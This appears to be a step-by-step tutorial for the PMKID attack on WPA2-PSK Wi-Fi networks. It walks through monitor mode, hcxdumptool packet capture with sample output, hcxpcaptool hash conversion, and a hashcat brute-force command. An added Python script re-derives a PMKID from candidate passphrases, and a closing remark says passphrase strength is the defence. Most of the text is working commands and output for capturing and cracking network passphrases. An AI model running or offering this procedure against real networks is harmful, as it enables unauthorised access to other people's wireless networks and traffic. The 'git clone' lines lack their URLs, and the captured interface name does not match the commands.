Download and install the tools
hcxdumptool
git clone
cd hcxdumptool
make
make install
hcxtools
git clone
cd hcxtools
make
make install
Step-1 : Put your wifi interface to monitor mode
airmon-ng start wlan0
Step-2 : start packet capture
hcxdumptool -o test.pcapng -i wlan0mon --enable_status=3
Output:
start capturing (stop with ctrl+c)
INTERFACE:...............: wlp39s0f3u4u5
FILTERLIST...............: 0 entries
MAC CLIENT...............: 89acf0e761f4 (client)
MAC ACCESS POINT.........: 4604ba734d4e (start NIC)
EAPOL TIMEOUT............: 20000
DEAUTHENTICATIONINTERVALL: 10 beacons
GIVE UP DEAUTHENTICATIONS: 20 tries
REPLAYCOUNTER............: 62083
ANONCE...................: 9ddca61888470946305b27d413a28cf474f19ff64c71667e5c1aee144cd70a69
If an AP receives our association request packet and supports sending PMKID, we will see a message "FOUND PMKID" after a moment:
[13:29:57 - 011] 89acf0e761f4 -> 4604ba734d4e <ESSID> [ASSOCIATIONREQUEST, SEQUENCE 4]
[13:29:57 - 011] 4604ba734d4e -> 89acf0e761f4 [ASSOCIATIONRESPONSE, SEQUENCE 1206]
[13:29:57 - 011] 4604ba734d4e -> 89acf0e761f4 [FOUND PMKID]
Step-3 : convert to hash format
hcxpcaptool -z test.16800 test.pcapng
output:
start reading from test.pcapng
summary:
--------
file name....................: test.pcapng
file type....................: pcapng 1.0
file hardware information....: x86_64
file os information..........: Linux 4.17.11-arch1
file application information.: hcxdumptool 4.2.0
network type.................: DLT_IEEE802_11_RADIO (127)
endianess....................: little endian
read errors..................: flawless
packets inside...............: 66
skipped packets..............: 0
packets with FCS.............: 0
beacons (with ESSID inside)..: 17
probe requests...............: 1
probe responses..............: 11
association requests.........: 5
association responses........: 5
authentications (OPEN SYSTEM): 13
authentications (BROADCOM)...: 1
EAPOL packets................: 14
EAPOL PMKIDs.................: 1
1 PMKID(s) written to test.16800
Step-4 : Crack the hash using hashcat
Now we have our hash in the test.16800 file. Feed it to hashcat to recover the passphrase.
Brute-force (mask) mode, here trying every 9-character all-lowercase passphrase:
hashcat -m 16800 test.16800 -a 3 -w 3 '?l?l?l?l?l?l?l?l?l'
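Added example (not code from the original page, nor from the hcxtools or hashcat projects): a short Python script that parses the hashcat 16800 line written in Step 3 and re-derives the PMKID from a candidate passphrase, which is the same PBKDF2 + HMAC-SHA1 computation hashcat repeats per guess in Step 4. It shows what the captured value actually contains and why one PMKID from a single association frame is enough for an offline guessing attack. The sample hash line is constructed inside the script from a made-up ESSID and passphrase; the two MAC addresses reuse the ones shown in the capture output above. Function names are my own.

```python
import hashlib
import hmac
import re

# hashcat -m 16800 line layout: PMKID*AP_MAC*CLIENT_MAC*ESSID_HEX (lowercase hex, '*' separated)
HASH_LINE_RE = re.compile(r"^([0-9a-f]{32})\*([0-9a-f]{12})\*([0-9a-f]{12})\*([0-9a-f]+)$")


def parse_16800(line):
    """Split a 16800 hash line into its binary fields; raises ValueError on malformed input."""
    m = HASH_LINE_RE.match(line.strip().lower())
    if m is None:
        raise ValueError("not a valid hashcat 16800 line: %r" % line)
    pmkid, ap_mac, sta_mac, essid = (bytes.fromhex(g) for g in m.groups())
    if not 1 <= len(essid) <= 32:  # 802.11 limits an SSID to 32 bytes
        raise ValueError("ESSID must be 1..32 bytes long")
    return {"pmkid": pmkid, "ap_mac": ap_mac, "sta_mac": sta_mac, "essid": essid}


def is_valid_16800(line):
    """Boolean wrapper around parse_16800 for quick validation of a hash file line."""
    try:
        parse_16800(line)
        return True
    except ValueError:
        return False


def derive_pmk(passphrase, essid):
    """WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"), essid, 4096, 32)


def derive_pmkid(pmk, ap_mac, sta_mac):
    """PMKID = first 128 bits of HMAC-SHA1(PMK, "PMK Name" || AP MAC || client MAC)."""
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]


def format_16800(pmkid, ap_mac, sta_mac, essid):
    """Build a 16800 line from binary fields (the inverse of parse_16800)."""
    return "*".join(x.hex() for x in (pmkid, ap_mac, sta_mac, essid))


def passphrase_matches(line, passphrase):
    """True if `passphrase` reproduces the PMKID stored in `line`."""
    f = parse_16800(line)
    candidate = derive_pmkid(derive_pmk(passphrase, f["essid"]), f["ap_mac"], f["sta_mac"])
    return hmac.compare_digest(candidate, f["pmkid"])


def mac_str(mac):
    """Render a 6-byte MAC as colon-separated hex."""
    return ":".join("%02x" % b for b in mac)


# Constructed sample: the ESSID and passphrase are made up for this example;
# the MACs are the AP and client addresses shown in the hcxdumptool output above.
SAMPLE_ESSID = b"home-net"
SAMPLE_PASSPHRASE = "correct horse battery"
SAMPLE_AP = bytes.fromhex("4604ba734d4e")
SAMPLE_STA = bytes.fromhex("89acf0e761f4")
SAMPLE_LINE = format_16800(
    derive_pmkid(derive_pmk(SAMPLE_PASSPHRASE, SAMPLE_ESSID), SAMPLE_AP, SAMPLE_STA),
    SAMPLE_AP, SAMPLE_STA, SAMPLE_ESSID,
)

if __name__ == "__main__":
    f = parse_16800(SAMPLE_LINE)
    print("hash line :", SAMPLE_LINE)
    print("ESSID     :", f["essid"].decode("utf-8", "replace"))
    print("AP MAC    :", mac_str(f["ap_mac"]))
    print("client MAC:", mac_str(f["sta_mac"]))
    print("passphrase matches:", passphrase_matches(SAMPLE_LINE, SAMPLE_PASSPHRASE))
```

Every candidate costs 4096 HMAC-SHA1 rounds for the PBKDF2 step, which is the only thing slowing the attack down; the PMKID itself adds a single HMAC. Nothing in the captured line is secret except what the PMK was derived from, so the passphrase's length and randomness are the effective defence, independent of whether a client was on the network when the frame was captured.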